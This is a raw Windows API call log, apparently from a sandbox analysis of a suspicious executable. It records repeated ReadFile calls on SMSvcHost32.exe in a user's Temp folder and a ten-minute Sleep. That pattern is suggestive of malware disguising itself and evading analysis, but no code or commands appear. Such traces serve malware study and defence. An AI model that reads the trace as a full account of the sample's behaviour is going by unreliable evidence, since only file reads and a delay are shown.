	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.326] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.326] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.326] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.326] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.326] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.326] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.326] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.328] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x35
	[0070.328] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpDst=0x718f68, nSize=0x35 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 0x35
	[0070.328] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8
	[0070.328] GetFileSize (in: hFile=0x1c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a400
	[0070.331] ReadFile (in: hFile=0x1c8, lpBuffer=0x736048, nNumberOfBytesToRead=0x3a400, lpNumberOfBytesRead=0x26afd1c, lpOverlapped=0x0 | out: lpBuffer=0x736048*, lpNumberOfBytesRead=0x26afd1c*=0x3a400, lpOverlapped=0x0) returned 1
	[0070.331] CloseHandle (hObject=0x1c8) returned 1
	[0070.331] Sleep (dwMilliseconds=0x927c0) 
	[0080.412] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0080.413] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.413] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.413] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.414] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.415] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
